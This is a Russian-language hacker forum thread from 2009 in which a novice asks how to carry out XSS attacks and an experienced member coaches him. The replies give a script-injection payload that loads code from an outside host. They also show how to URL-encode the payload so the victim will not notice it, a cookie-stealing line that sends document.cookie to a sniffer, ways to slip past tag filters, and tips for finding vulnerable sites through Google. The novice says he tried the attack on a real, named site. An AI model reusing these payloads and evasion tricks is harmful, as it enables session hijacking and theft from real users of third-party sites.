Вопрос по XSS атаке
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Вопрос по XSS атаке - 2009-03-21 21:21:17.033333
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
Есть сайт http://hacker.3dn.ru/publ/1-1-0-45 . На нём этот вид отаки достаточно понятно написан, но есть парочка вопросов:
1) quote:
Это и будет нашим атакующим кодом. А вызывать мы его будем путем вставки на уязвимую страницу следующего кода:
quote:
<script src=http://myhost.hut.ru/file.js></script>
Что, можно так и кидать ссылку пользователю? или её нужно как то отформатировать, превратить в url или во что то ещё?Как получить куки и куда они сохраняться?
2) Как паказано в примере можно из обычной строки
quote:
Http://myhost.hut.ru/encodeurl.php?str=<script src=http://myhost.hut.ru/file.js></script>
Сделать вот, что:
quote:
http://site.ru/info.php?login=%3c%73%63%72%69%70%74%20%73%72%63%3d%68
%74%74%70%3a%2f%2f%6d%79%68%6f%73%74%2e%68%75%74%2e
%72%75%2f%66%69%6c%65%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e
Каким образом? если можно по подробней.
p.s Прошу прощения за такую неграмотность относительно xss. Я только недавно начал изучать данный вит атак.Да, и если реклама запрещена просьба не удалять тему, а просто уведомить меня в пм, что бы я убрал ссылку.
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-21 22:11:20.886666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
1) не совсем понял вопроса. <sсriрt src=http://myhost.hut.ru/file.js></sсriрt> это код который надо внедрить в страницу навсегда(активный XSS) или разово и совать ссылку, внедряющую этот код, атакуемому (пассивный XSS).
2) Если при пассивном XSS мы будем совать атакуемому ссыль вида:
http://site.ru/info.php?login=<sсriрt src=http://myhost.hut.ru/file.js></sсriрt> это будет палевно. Чтобы не светиться надо передаваемый параметр зашифровать. Урленкод существует для передачи в строке запрещенных символов (например, пробелов), но в принципе заУРЛэнкодить можно все. Попав на сервер все параметры будут раскодированны.
P.S. а, вообще, для таких вопросов существует прикрепленный топик
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-21 22:20:19.556666
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
Кое с чем я разобрался. Можно узнать по подробней как можно зашифровать код?
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-21 22:20:41.213333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
FriLL
Так вроде он спрашивает не про конкретный сайт, а про метод.
Или я чего-то не понял?
Dikoy
возьми php функции urlencod() - зашифровка, urldecode() - расшифровка
Но эти функции зашифровывают только запрещенные символы.
А так, урлэнкод - это шестнадцатеричные коды символов со знаками %
Вот скриптец кодирования:
$str="<sсriрt></sсriрt>"; //строка для кодирования
for($i=0; $i<strlen($str); $i++){
$code.="%".dechex(ord($str[$i]));
}
echo $code;
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-21 22:54:58.056666
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
нет, ты всё правильно понял спасибо)
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-22 11:32:53.343333
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
вопрос по уроку Xakep'а9009
на сайте http://shurem.ru/ я пытался(как было скзано в урое) отправить лс со скриптом и поменять данные в профили
Вот что у меня получилось:
1) в данных img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;(эта строка видна при просмотре профиля) никакой записи в снифере нет
2) В сообщении показана тема"alert('Xakep9009_Rullz') Привет" текст сообщения "alert('Hellow_World')"
Помогите понять что я сделал не так?
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-22 13:20:59.656666
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
Можно ли через гугл найти xss уязвимости в сайтах? типо ввёл любой скрипт, а гугл отобразит где его можно воплатить в жизнь)
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-22 15:11:42.566666
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Я, конечно, не проделывал уроки, но если у тебя строка
img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie; отображается как есть, то значит ты не заключил ее в тег <script></script>
По поводу гугла прям такой халявы помойму нет. Но Гугл - это сила. Через него можно искать стандартные конструкции теоретически подверженные XSS (форумы, формы коментариев, и т.д.) и их уже проверять ручками.
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-22 15:48:07.756666
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
теги стоят, а проблема таже
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-22 16:05:26.263333
|
|
|
horiz
Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
|
Так, если ты хочешь записать строку
<sсriрt>img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;</sсriрt> а записывается лишь
img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie; значит там поставили вырезание тегов <sсriрt></sсriрt>. Просмотри исходный код получившейся страницы.
Если так, то попробуй писать эти теги так:
<sсrIрt>
<sсriрt >
и т.д.
|
|
|
|
|
RE: Вопрос по XSS атаке - 2009-03-22 17:26:47.760000
|
|
|
Dikoy
Сообщений: 68
Оценки: 0
Присоединился: 2009-03-03 08:48:14.176666
|
спасибо. я ещё нашёл парочку способов сделать правильно
|
|
|
|
|
|
